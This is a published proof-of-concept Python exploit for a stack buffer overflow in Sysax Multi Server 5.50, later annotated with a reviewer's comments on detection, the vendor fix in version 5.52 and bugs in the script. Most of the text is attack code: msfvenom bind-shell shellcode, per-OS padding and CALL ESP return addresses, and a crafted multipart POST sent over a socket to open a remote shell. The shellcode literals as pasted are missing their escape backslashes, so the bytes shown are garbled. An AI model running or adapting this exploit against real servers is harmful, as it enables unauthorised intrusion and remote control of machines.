Sysax Multi Server 5.50 Buffer Overflow
Posted on 18 January 2012
#!/usr/bin/python
##########################################################################################################
#Title: Sysax Multi Server 5.50 Create Folder BOF
#Author: Craig Freyman (@cd1zz)
#Tested on: XP SP3 32bit and Server 2003 SP2 32bit(No DEP)
#Date Discovered: January 13, 2012
#Vendor Contacted: January 15, 2012
#Vendor Response: January 16, 2012
#Vendor Fix: Version 5.52 released on January 17, 2012 fixes issue
#Additional exploit details, notes and assumptions can be found here:
#http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html
##########################################################################################################
# Proof-of-concept for a stack buffer overflow in the "create folder" handler of
# Sysax Multi Server 5.50; the vendor fixed it in 5.52 (see header above), so the
# mitigation is to upgrade. Detection angle, from the request built below: a POST
# to /scgi with pid=mk_folder2_name1.htm whose multipart field "e2" is far larger
# than the declared Content-Length.
# NOTE(review): this is a Python 2 script (print statements). The string literals
# below are reproduced as pasted; whether they still match the author's original
# bytes cannot be confirmed from this copy.
import socket,sys
# Exactly four positional arguments are required: target, port, session id, OS tag.
if len(sys.argv) != 5:
    print "[+] Usage: ./filename.py <Target IP> <Port> <SID> <XP or 2K3>"
    sys.exit(1)
target = sys.argv[1]
port = int(sys.argv[2])  # raises ValueError on a non-numeric port; not caught
sid = sys.argv[3]
os = sys.argv[4]  # NOTE: shadows the stdlib module name `os` (not imported here)
# The session id is embedded in the request URL below; it must be 40 characters.
if len(sid) != 40:
    print "[X] Something is wrong with your SID, it should be 40 bytes long."
    print "[X] Refer to http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html"
    sys.exit(1)
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/shikata_ga_nai -b "x00"
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# Payload blob as given in the listing; generated with the msfvenom command above.
shell = ("xdaxdcxd9x74x24xf4x5fx2bxc9xb8xb7x6exc5xe9"
"xb1x56x83xc7x04x31x47x14x03x47xa3x8cx30x15"
"x23xd9xbbxe6xb3xbax32x03x82xe8x21x47xb6x3c"
"x21x05x3axb6x67xbexc9xbaxafxb1x7ax70x96xfc"
"x7bxb4x16x52xbfxd6xeaxa9x93x38xd2x61xe6x39"
"x13x9fx08x6bxccxebxbax9cx79xa9x06x9cxadxa5"
"x36xe6xc8x7axc2x5cxd2xaax7axeax9cx52xf1xb4"
"x3cx62xd6xa6x01x2dx53x1cxf1xacxb5x6cxfax9e"
"xf9x23xc5x2exf4x3ax01x88xe6x48x79xeax9bx4a"
"xbax90x47xdex5fx32x0cx78x84xc2xc1x1fx4fxc8"
"xaex54x17xcdx31xb8x23xe9xbax3fxe4x7bxf8x1b"
"x20x27x5bx05x71x8dx0ax3ax61x69xf3x9exe9x98"
"xe0x99xb3xf4xc5x97x4bx05x41xafx38x37xcex1b"
"xd7x7bx87x85x20x7bxb2x72xbex82x3cx83x96x40"
"x68xd3x80x61x10xb8x50x8dxc5x6fx01x21xb5xcf"
"xf1x81x65xb8x1bx0ex5axd8x23xc4xedxdexedx3c"
"xbex88x0fxc3x51x15x99x25x3bxb5xcfxfexd3x77"
"x34x37x44x87x1ex6bxddx1fx16x65xd9x20xa7xa3"
"x4ax8cx0fx24x18xdex8bx55x1fxcbxbbx1cx18x9c"
"x36x71xebx3cx46x58x9bxddxd5x07x5bxabxc5x9f"
"x0cxfcx38xd6xd8x10x62x40xfexe8xf2xabxbax36"
"xc7x32x43xbax73x11x53x02x7bx1dx07xdax2axcb"
"xf1x9cx84xbdxabx76x7ax14x3bx0exb0xa7x3dx0f"
"x9dx51xa1xbex48x24xdex0fx1dxa0xa7x6dxbdx4f"
"x72x36xcdx05xdex1fx46xc0x8bx1dx0bxf3x66x61"
"x32x70x82x1axc1x68xe7x1fx8dx2ex14x52x9exda"
"x1axc1x9fxce")
#No DEP bypass :(
# Padding length and return address differ per target build (see the "Tested on"
# line), so the script branches on the fourth argument. Any value other than
# "2K3" or "XP" leaves `buf` unassigned and the `head += buf` line below raises
# NameError instead of a usage error.
if os == "2K3":
    junk = "x41" * 648
    jump = "xDFxF2xE5x77" #77E5F2DF CALL ESP kernel32.dll
    buf = junk + jump + "x90" * 10 + shell + "x44" * 1000
if os == "XP":
    junk = "x41" * 667
    jump = "xF0x69x83x7C" #7C8369F0 CALL ESP kernel32.dll
    buf = junk + jump + "x90" * 50 + shell + "x44" * 1000
print "================================================"
print "[*] Sysax Multi Server 5.50 Create Folder BOF"
print "[*] ------------------by cd1zz------------------"
print "[*] Launching exploit against " + target + "...."
print "================================================"
# Hand-built multipart POST. NOTE(review): the line terminators of the header
# lines are not visible in this copy, and the inner quotes around e2 in the
# Content-Disposition line are unescaped as pasted.
head = "POST /scgi?sid="+sid+"&pid=mk_folder2_name1.htm HTTP/1.1 "
head += "Host: "
head += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 "
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 "
head += "Accept-Language: en-us,en;q=0.5 "
head += "Accept-Encoding: gzip, deflate "
head += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 "
head += "Proxy-Connection: keep-alive "
head += "Referer: http://"+target+"/scgi?sid="+sid+"&pid=mk_folder1_name1.htm "
head += "Content-Type: multipart/form-data; boundary=---------------------------1190753071675116720811342231 "
# Content-Length is hard-coded to 171 although `buf` alone is well over 1000
# characters, so the declared and actual body sizes disagree.
head += "Content-Length: 171 "
head += "-----------------------------1190753071675116720811342231 "
head += "Content-Disposition: form-data; name="e2" "
head += buf+" "
head += "-----------------------------1190753071675116720811342231-- "
# Single connect/send/recv. The bare except below hides the real failure
# (refused connection, timeout, the NameError mentioned above, ...); s.send may
# transmit fewer bytes than the whole buffer; and s.close only runs on the
# success path.
try:
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(head + " ")
    print "[*] Payload sent!"
    print "[*] Go check your shell..."
    s.recv(1024)
    s.close()
except:
    print "[X] Meh! Fail!"
